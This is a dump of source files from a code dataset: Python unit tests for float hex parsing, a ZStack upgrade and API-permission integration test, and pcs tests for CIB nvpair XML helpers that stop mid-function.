def test_from_hex(self):
MIN = self.MIN;
MAX = self.MAX;
TINY = self.TINY;
EPS = self.EPS;
# two spellings of infinity, with optional signs; case-insensitive
self.identical(fromHex('inf'), INF)
self.identical(fromHex('+Inf'), INF)
self.identical(fromHex('-INF'), -INF)
self.identical(fromHex('iNf'), INF)
self.identical(fromHex('Infinity'), INF)
self.identical(fromHex('+INFINITY'), INF)
self.identical(fromHex('-infinity'), -INF)
self.identical(fromHex('-iNFiNitY'), -INF)
# nans with optional sign; case insensitive
self.identical(fromHex('nan'), NAN)
self.identical(fromHex('+NaN'), NAN)
self.identical(fromHex('-NaN'), NAN)
self.identical(fromHex('-nAN'), NAN)
# variations in input format
self.identical(fromHex('1'), 1.0)
self.identical(fromHex('+1'), 1.0)
self.identical(fromHex('1.'), 1.0)
self.identical(fromHex('1.0'), 1.0)
self.identical(fromHex('1.0p0'), 1.0)
self.identical(fromHex('01'), 1.0)
self.identical(fromHex('01.'), 1.0)
self.identical(fromHex('0x1'), 1.0)
self.identical(fromHex('0x1.'), 1.0)
self.identical(fromHex('0x1.0'), 1.0)
self.identical(fromHex('+0x1.0'), 1.0)
self.identical(fromHex('0x1p0'), 1.0)
self.identical(fromHex('0X1p0'), 1.0)
self.identical(fromHex('0X1P0'), 1.0)
self.identical(fromHex('0x1P0'), 1.0)
self.identical(fromHex('0x1.p0'), 1.0)
self.identical(fromHex('0x1.0p0'), 1.0)
self.identical(fromHex('0x.1p4'), 1.0)
self.identical(fromHex('0x.1p04'), 1.0)
self.identical(fromHex('0x.1p004'), 1.0)
self.identical(fromHex('0x1p+0'), 1.0)
self.identical(fromHex('0x1P-0'), 1.0)
self.identical(fromHex('+0x1p0'), 1.0)
self.identical(fromHex('0x01p0'), 1.0)
self.identical(fromHex('0x1p00'), 1.0)
self.identical(fromHex(u'0x1p0'), 1.0)
self.identical(fromHex(' 0x1p0 '), 1.0)
self.identical(fromHex('\n 0x1p0'), 1.0)
self.identical(fromHex('0x1p0 \t'), 1.0)
self.identical(fromHex('0xap0'), 10.0)
self.identical(fromHex('0xAp0'), 10.0)
self.identical(fromHex('0xaP0'), 10.0)
self.identical(fromHex('0xAP0'), 10.0)
self.identical(fromHex('0xbep0'), 190.0)
self.identical(fromHex('0xBep0'), 190.0)
self.identical(fromHex('0xbEp0'), 190.0)
self.identical(fromHex('0XBE0P-4'), 190.0)
self.identical(fromHex('0xBEp0'), 190.0)
self.identical(fromHex('0xB.Ep4'), 190.0)
self.identical(fromHex('0x.BEp8'), 190.0)
self.identical(fromHex('0x.0BEp12'), 190.0)
# moving the point around
pi = fromHex('0x1.921fb54442d18p1')
self.identical(fromHex('0x.006487ed5110b46p11'), pi)
self.identical(fromHex('0x.00c90fdaa22168cp10'), pi)
self.identical(fromHex('0x.01921fb54442d18p9'), pi)
self.identical(fromHex('0x.03243f6a8885a3p8'), pi)
self.identical(fromHex('0x.06487ed5110b46p7'), pi)
self.identical(fromHex('0x.0c90fdaa22168cp6'), pi)
self.identical(fromHex('0x.1921fb54442d18p5'), pi)
self.identical(fromHex('0x.3243f6a8885a3p4'), pi)
self.identical(fromHex('0x.6487ed5110b46p3'), pi)
self.identical(fromHex('0x.c90fdaa22168cp2'), pi)
self.identical(fromHex('0x1.921fb54442d18p1'), pi)
self.identical(fromHex('0x3.243f6a8885a3p0'), pi)
self.identical(fromHex('0x6.487ed5110b46p-1'), pi)
self.identical(fromHex('0xc.90fdaa22168cp-2'), pi)
self.identical(fromHex('0x19.21fb54442d18p-3'), pi)
self.identical(fromHex('0x32.43f6a8885a3p-4'), pi)
self.identical(fromHex('0x64.87ed5110b46p-5'), pi)
self.identical(fromHex('0xc9.0fdaa22168cp-6'), pi)
self.identical(fromHex('0x192.1fb54442d18p-7'), pi)
self.identical(fromHex('0x324.3f6a8885a3p-8'), pi)
self.identical(fromHex('0x648.7ed5110b46p-9'), pi)
self.identical(fromHex('0xc90.fdaa22168cp-10'), pi)
self.identical(fromHex('0x1921.fb54442d18p-11'), pi)
# ...
self.identical(fromHex('0x1921fb54442d1.8p-47'), pi)
self.identical(fromHex('0x3243f6a8885a3p-48'), pi)
self.identical(fromHex('0x6487ed5110b46p-49'), pi)
self.identical(fromHex('0xc90fdaa22168cp-50'), pi)
self.identical(fromHex('0x1921fb54442d18p-51'), pi)
self.identical(fromHex('0x3243f6a8885a30p-52'), pi)
self.identical(fromHex('0x6487ed5110b460p-53'), pi)
self.identical(fromHex('0xc90fdaa22168c0p-54'), pi)
self.identical(fromHex('0x1921fb54442d180p-55'), pi)
# results that should overflow...
self.assertRaises(OverflowError, fromHex, '-0x1p1024')
self.assertRaises(OverflowError, fromHex, '0x1p+1025')
self.assertRaises(OverflowError, fromHex, '+0X1p1030')
self.assertRaises(OverflowError, fromHex, '-0x1p+1100')
self.assertRaises(OverflowError, fromHex, '0X1p123456789123456789')
self.assertRaises(OverflowError, fromHex, '+0X.8p+1025')
self.assertRaises(OverflowError, fromHex, '+0x0.8p1025')
self.assertRaises(OverflowError, fromHex, '-0x0.4p1026')
self.assertRaises(OverflowError, fromHex, '0X2p+1023')
self.assertRaises(OverflowError, fromHex, '0x2.p1023')
self.assertRaises(OverflowError, fromHex, '-0x2.0p+1023')
self.assertRaises(OverflowError, fromHex, '+0X4p+1022')
self.assertRaises(OverflowError, fromHex, '0x1.ffffffffffffffp+1023')
self.assertRaises(OverflowError, fromHex, '-0X1.fffffffffffff9p1023')
self.assertRaises(OverflowError, fromHex, '0X1.fffffffffffff8p1023')
self.assertRaises(OverflowError, fromHex, '+0x3.fffffffffffffp1022')
self.assertRaises(OverflowError, fromHex, '0x3fffffffffffffp+970')
self.assertRaises(OverflowError, fromHex, '0x10000000000000000p960')
self.assertRaises(OverflowError, fromHex, '-0Xffffffffffffffffp960')
# ...and those that round to +-max float
self.identical(fromHex('+0x1.fffffffffffffp+1023'), MAX)
self.identical(fromHex('-0X1.fffffffffffff7p1023'), -MAX)
self.identical(fromHex('0X1.fffffffffffff7fffffffffffffp1023'), MAX)
# zeros
self.identical(fromHex('0x0p0'), 0.0)
self.identical(fromHex('0x0p1000'), 0.0)
self.identical(fromHex('-0x0p1023'), -0.0)
self.identical(fromHex('0X0p1024'), 0.0)
self.identical(fromHex('-0x0p1025'), -0.0)
self.identical(fromHex('0X0p2000'), 0.0)
self.identical(fromHex('0x0p123456789123456789'), 0.0)
self.identical(fromHex('-0X0p-0'), -0.0)
self.identical(fromHex('-0X0p-1000'), -0.0)
self.identical(fromHex('0x0p-1023'), 0.0)
self.identical(fromHex('-0X0p-1024'), -0.0)
self.identical(fromHex('-0x0p-1025'), -0.0)
self.identical(fromHex('-0x0p-1072'), -0.0)
self.identical(fromHex('0X0p-1073'), 0.0)
self.identical(fromHex('-0x0p-1074'), -0.0)
self.identical(fromHex('0x0p-1075'), 0.0)
self.identical(fromHex('0X0p-1076'), 0.0)
self.identical(fromHex('-0X0p-2000'), -0.0)
self.identical(fromHex('-0x0p-123456789123456789'), -0.0)
# values that should underflow to 0
self.identical(fromHex('0X1p-1075'), 0.0)
self.identical(fromHex('-0X1p-1075'), -0.0)
self.identical(fromHex('-0x1p-123456789123456789'), -0.0)
self.identical(fromHex('0x1.00000000000000001p-1075'), TINY)
self.identical(fromHex('-0x1.1p-1075'), -TINY)
self.identical(fromHex('0x1.fffffffffffffffffp-1075'), TINY)
# check round-half-even is working correctly near 0 ...
self.identical(fromHex('0x1p-1076'), 0.0)
self.identical(fromHex('0X2p-1076'), 0.0)
self.identical(fromHex('0X3p-1076'), TINY)
self.identical(fromHex('0x4p-1076'), TINY)
self.identical(fromHex('0X5p-1076'), TINY)
self.identical(fromHex('0X6p-1076'), 2*TINY)
self.identical(fromHex('0x7p-1076'), 2*TINY)
self.identical(fromHex('0X8p-1076'), 2*TINY)
self.identical(fromHex('0X9p-1076'), 2*TINY)
self.identical(fromHex('0xap-1076'), 2*TINY)
self.identical(fromHex('0Xbp-1076'), 3*TINY)
self.identical(fromHex('0xcp-1076'), 3*TINY)
self.identical(fromHex('0Xdp-1076'), 3*TINY)
self.identical(fromHex('0Xep-1076'), 4*TINY)
self.identical(fromHex('0xfp-1076'), 4*TINY)
self.identical(fromHex('0x10p-1076'), 4*TINY)
self.identical(fromHex('-0x1p-1076'), -0.0)
self.identical(fromHex('-0X2p-1076'), -0.0)
self.identical(fromHex('-0x3p-1076'), -TINY)
self.identical(fromHex('-0X4p-1076'), -TINY)
self.identical(fromHex('-0x5p-1076'), -TINY)
self.identical(fromHex('-0x6p-1076'), -2*TINY)
self.identical(fromHex('-0X7p-1076'), -2*TINY)
self.identical(fromHex('-0X8p-1076'), -2*TINY)
self.identical(fromHex('-0X9p-1076'), -2*TINY)
self.identical(fromHex('-0Xap-1076'), -2*TINY)
self.identical(fromHex('-0xbp-1076'), -3*TINY)
self.identical(fromHex('-0xcp-1076'), -3*TINY)
self.identical(fromHex('-0Xdp-1076'), -3*TINY)
self.identical(fromHex('-0xep-1076'), -4*TINY)
self.identical(fromHex('-0Xfp-1076'), -4*TINY)
self.identical(fromHex('-0X10p-1076'), -4*TINY)
# ... and near MIN ...
self.identical(fromHex('0x0.ffffffffffffd6p-1022'), MIN-3*TINY)
self.identical(fromHex('0x0.ffffffffffffd8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdap-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdcp-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdep-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe0p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe2p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe4p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe6p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffeap-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffecp-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffeep-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff0p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff2p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff4p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff6p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff8p-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffap-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffcp-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffep-1022'), MIN)
self.identical(fromHex('0x1.00000000000000p-1022'), MIN)
self.identical(fromHex('0x1.00000000000002p-1022'), MIN)
self.identical(fromHex('0x1.00000000000004p-1022'), MIN)
self.identical(fromHex('0x1.00000000000006p-1022'), MIN)
self.identical(fromHex('0x1.00000000000008p-1022'), MIN)
self.identical(fromHex('0x1.0000000000000ap-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000cp-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000ep-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000010p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000012p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000014p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000016p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000018p-1022'), MIN+2*TINY)
# ... and near 1.0.
self.identical(fromHex('0x0.fffffffffffff0p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff1p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff2p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff3p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff4p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff5p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff6p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff7p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff8p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff9p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffap0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffffbp0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffcp0'), 1.0)
self.identical(fromHex('0x0.fffffffffffffdp0'), 1.0)
self.identical(fromHex('0X0.fffffffffffffep0'), 1.0)
self.identical(fromHex('0x0.ffffffffffffffp0'), 1.0)
self.identical(fromHex('0X1.00000000000000p0'), 1.0)
self.identical(fromHex('0X1.00000000000001p0'), 1.0)
self.identical(fromHex('0x1.00000000000002p0'), 1.0)
self.identical(fromHex('0X1.00000000000003p0'), 1.0)
self.identical(fromHex('0x1.00000000000004p0'), 1.0)
self.identical(fromHex('0X1.00000000000005p0'), 1.0)
self.identical(fromHex('0X1.00000000000006p0'), 1.0)
self.identical(fromHex('0X1.00000000000007p0'), 1.0)
self.identical(fromHex('0x1.00000000000007ffffffffffffffffffffp0'),
1.0)
self.identical(fromHex('0x1.00000000000008p0'), 1.0)
self.identical(fromHex('0x1.00000000000008000000000000000001p0'),
1+EPS)
self.identical(fromHex('0X1.00000000000009p0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ap0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000bp0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000cp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000dp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ep0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000fp0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000010p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000011p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000012p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000013p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000014p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000015p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000016p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000017p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000017ffffffffffffffffffffp0'),
1.0+EPS)
self.identical(fromHex('0x1.00000000000018p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.00000000000018000000000000000001p0'),
1.0+2*EPS)
self.identical(fromHex('0x1.00000000000019p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001ap0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001bp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001cp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001dp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001ep0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001fp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.00000000000020p0'), 1.0+2*EPS)
def test_roundtrip(self):
def roundtrip(x):
return fromHex(toHex(x))
for x in [NAN, INF, self.MAX, self.MIN, self.MIN-self.TINY, self.TINY, 0.0]:
self.identical(x, roundtrip(x))
self.identical(-x, roundtrip(-x))
# fromHex(toHex(x)) should exactly recover x, for any non-NaN float x.
import random
for i in xrange(10000):
e = random.randrange(-1200, 1200)
m = random.random()
s = random.choice([1.0, -1.0])
try:
x = s*ldexp(m, e)
except OverflowError:
pass
else:
self.identical(x, fromHex(toHex(x)))
def test_main():
test_support.run_unittest(
GeneralFloatCases,
FormatFunctionsTestCase,
UnknownFormatTestCase,
IEEEFormatTestCase,
ReprTestCase,
InfNanTest,
HexFloatTestCase,
)
if __name__ == '__main__':
test_main()
| lgpl-2.1 | 8,380,972,892,409,875,000 | 43.430667 | 98 | 0.586592 | false |
zstackio/zstack-woodpecker | integrationtest/vm/installation/api_perimission_check/test_zs_upgd_3.5.2_latest_on_cos74_22976.py | 1 | 2730 | '''
#Cover 22976
based on test_zs_upgd_3.5.2_latest_on_cos74.py
Test the upgrade master from 3.5.2.53 & check API permissions
@author: Zhaohao
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.operations.scenario_operations as scen_ops
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
vm_inv = None
def test():
global vm_inv
test_util.test_dsc('Create test vm to test zstack upgrade by -u.')
image_name = os.environ.get('imageNameBase_352_mn_c74')
c74_iso_path = os.environ.get('c74_iso_path')
#iso_21_path = os.environ.get('iso_21_path')
zstack_latest_version = os.environ.get('zstackLatestVersion')
zstack_latest_path = os.environ.get('zstackLatestInstaller')
vm_name = os.environ.get('vmName')
upgrade_script_path = os.environ.get('upgradeScript')
vm_inv = test_stub.create_vm_scenario(image_name, vm_name)
vm_ip = vm_inv.vmNics[0].ip
test_lib.lib_wait_target_up(vm_ip, 22)
test_stub.make_ssh_no_password(vm_ip, tmp_file)
test_util.test_logger('Update MN IP')
test_stub.update_mn_hostname(vm_ip, tmp_file)
test_stub.update_mn_ip(vm_ip, tmp_file)
test_stub.stop_mn(vm_ip, tmp_file)
test_stub.start_node(vm_ip, tmp_file)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
test_stub.create_vid(vm_ip, 'vid_test')
pms1 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
#test_stub.check_installation(vm_ip, tmp_file)
test_util.test_logger('Upgrade zstack to latest')
test_stub.update_c74_iso(vm_ip, tmp_file, c74_iso_path, upgrade_script_path)
#test_stub.updatei_21_iso(vm_ip, tmp_file, iso_21_path, upgrade_script_path)
test_stub.upgrade_zstack(vm_ip, zstack_latest_path, tmp_file)
test_stub.check_zstack_version(vm_ip, tmp_file, zstack_latest_version)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
pms2 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
test_stub.check_permissions(pms1, pms2)
#test_stub.check_installation(vm_ip, tmp_file)
os.system('rm -f %s' % tmp_file)
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_util.test_pass('ZStack 3.5.2 to master upgrade Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
if vm_inv:
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
| apache-2.0 | -5,392,050,688,931,675,000 | 35.891892 | 80 | 0.699634 | false |
ClusterLabs/pcs | pcs_test/tier0/lib/cib/test_nvpair.py | 3 | 16477 | from unittest import TestCase
from lxml import etree
from pcs_test.tools.assertions import assert_xml_equal
from pcs_test.tools.xml import etree_to_str
from pcs.lib.cib import nvpair
from pcs.lib.cib.tools import IdProvider
# pylint: disable=no-self-use, protected-access
class AppendNewNvpair(TestCase):
def test_append_new_nvpair_to_given_element(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
id_provider = IdProvider(nvset_element)
nvpair._append_new_nvpair(nvset_element, "b", "c", id_provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b" name="b" value="c"></nvpair>
</nvset>
""",
)
def test_with_id_provider(self):
nvset_element = etree.fromstring('<nvset id="a"/>')
provider = IdProvider(nvset_element)
provider.book_ids("a-b")
nvpair._append_new_nvpair(nvset_element, "b", "c", provider)
assert_xml_equal(
etree_to_str(nvset_element),
"""
<nvset id="a">
<nvpair id="a-b-1" name="b" value="c"></nvpair>
</nvset>
""",
)
class UpdateNvsetTest(TestCase):
def test_updates_nvset(self):
nvset_element = etree.fromstring(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
<nvpair id="iattrs-c" name="c" value="d"/>
<nvpair id="iattrs-e" name="e" value="f"/>
</instance_attributes>
"""
)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(
nvset_element,
{
"a": "B",
"c": "",
"g": "h",
},
id_provider,
)
assert_xml_equal(
"""
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="B"/>
<nvpair id="iattrs-e" name="e" value="f"/>
<nvpair id="iattrs-g" name="g" value="h"/>
</instance_attributes>
""",
etree_to_str(nvset_element),
)
def test_empty_value_has_no_effect(self):
xml = """
<instance_attributes id="iattrs">
<nvpair id="iattrs-b" name="a" value="b"/>
<nvpair id="iattrs-d" name="c" value="d"/>
<nvpair id="iattrs-f" name="e" value="f"/>
</instance_attributes>
"""
nvset_element = etree.fromstring(xml)
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {}, id_provider)
assert_xml_equal(xml, etree_to_str(nvset_element))
def test_keep_empty_nvset(self):
xml_pre = """
<resource>
<instance_attributes id="iattrs">
<nvpair id="iattrs-a" name="a" value="b"/>
</instance_attributes>
</resource>
"""
xml_post = """
<resource>
<instance_attributes id="iattrs" />
</resource>
"""
xml = etree.fromstring(xml_pre)
nvset_element = xml.find("instance_attributes")
id_provider = IdProvider(nvset_element)
nvpair.update_nvset(nvset_element, {"a": ""}, id_provider)
assert_xml_equal(xml_post, etree_to_str(xml))
class SetNvpairInNvsetTest(TestCase):
def setUp(self):
self.nvset = etree.Element("nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_update(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr", "10", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_add(self):
nvpair.set_nvpair_in_nvset(self.nvset, "test", "0", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr2", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_remove_not_existing(self):
nvpair.set_nvpair_in_nvset(self.nvset, "attr3", "", self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
class AppendNewNvsetTest(TestCase):
def test_append_new_nvset_to_given_element(self):
context_element = etree.fromstring('<context id="a"/>')
id_provider = IdProvider(context_element)
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
id_provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes">
<nvpair
id="a-instance_attributes-a" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
def test_with_id_provider_booked_ids(self):
context_element = etree.fromstring('<context id="a"/>')
provider = IdProvider(context_element)
provider.book_ids("a-instance_attributes", "a-instance_attributes-1-a")
nvpair.append_new_nvset(
"instance_attributes",
context_element,
{
"a": "b",
"c": "d",
},
provider,
)
assert_xml_equal(
"""
<context id="a">
<instance_attributes id="a-instance_attributes-1">
<nvpair
id="a-instance_attributes-1-a-1" name="a" value="b"
/>
<nvpair
id="a-instance_attributes-1-c" name="c" value="d"
/>
</instance_attributes>
</context>
""",
etree_to_str(context_element),
)
class ArrangeFirstNvsetTest(TestCase):
def setUp(self):
self.root = etree.Element("root", id="root")
self.nvset = etree.SubElement(self.root, "nvset", id="nvset")
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr", name="attr", value="1"
)
etree.SubElement(
self.nvset, "nvpair", id="nvset-attr2", name="attr2", value="2"
)
etree.SubElement(
self.nvset, "notnvpair", id="nvset-test", name="test", value="0"
)
self.id_provider = IdProvider(self.nvset)
def test_empty_value_has_no_effect(self):
nvpair.arrange_first_nvset("nvset", self.root, {}, self.id_provider)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="1"/>
<nvpair id="nvset-attr2" name="attr2" value="2"/>
<notnvpair id="nvset-test" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_update_existing_nvset(self):
nvpair.arrange_first_nvset(
"nvset",
self.root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<nvset id="nvset">
<nvpair id="nvset-attr" name="attr" value="10"/>
<notnvpair id="nvset-test" name="test" value="0"/>
<nvpair id="nvset-new_one" name="new_one" value="20"/>
<nvpair id="nvset-test-1" name="test" value="0"/>
</nvset>
""",
etree_to_str(self.nvset),
)
def test_create_new_nvset_if_does_not_exist(self):
root = etree.Element("root", id="root")
nvpair.arrange_first_nvset(
"nvset",
root,
{"attr": "10", "new_one": "20", "test": "0", "attr2": ""},
self.id_provider,
)
assert_xml_equal(
"""
<root id="root">
<nvset id="root-nvset">
<nvpair id="root-nvset-attr" name="attr" value="10"/>
<nvpair id="root-nvset-new_one" name="new_one" value="20"/>
<nvpair id="root-nvset-test" name="test" value="0"/>
</nvset>
</root>
""",
etree_to_str(root),
)
class GetNvsetTest(TestCase):
def test_success(self):
nvset = etree.XML(
"""
<nvset>
<nvpair id="nvset-name1" name="name1" value="value1"/>
<nvpair id="nvset-name2" name="name2" value="value2"/>
<nvpair id="nvset-name3" name="name3"/>
</nvset>
"""
)
self.assertEqual(
[
{"id": "nvset-name1", "name": "name1", "value": "value1"},
{"id": "nvset-name2", "name": "name2", "value": "value2"},
{"id": "nvset-name3", "name": "name3", "value": ""},
],
nvpair.get_nvset(nvset),
)
class GetValue(TestCase):
def assert_find_value(self, tag_name, name, value, xml, default=None):
self.assertEqual(
value,
nvpair.get_value(tag_name, etree.fromstring(xml), name, default),
)
def test_return_value_when_name_exists(self):
self.assert_find_value(
"meta_attributes",
"SOME-NAME",
"some-value",
"""
<context>
<meta_attributes>
<nvpair name="SOME-NAME" value="some-value" />
<nvpair name="OTHER-NAME" value="other-value" />
</meta_attributes>
</context>
""",
)
def test_return_none_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
)
def test_return_default_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value="DEFAULT",
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
default="DEFAULT",
)
def test_return_none_when_no_nvpair(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes />
</context>
""",
)
def test_return_none_when_no_nvset(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
</context>
""",
)
class GetNvsetAsDictTest(TestCase):
def test_no_element(self):
resource_element = etree.fromstring("<primitive/>")
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes/>
</primitive>
"""
)
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_non_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_multiple_nvsets(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
<meta_attributes>
<nvpair id="a" name="attr_name2" value="value2"/>
<nvpair id="b" name="other_name2" value="other-value2"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
class HasMetaAttribute(TestCase):
def test_return_false_if_does_not_have_such_attribute(self):
resource_element = etree.fromstring("""<primitive/>""")
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_true_if_such_meta_attribute_exists(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertTrue(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_false_if_meta_attribute_exists_but_in_nested_element(self):
resource_element = etree.fromstring(
"""
<group>
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
</meta_attributes>
</primitive>
</group>
"""
)
self.assertFalse(
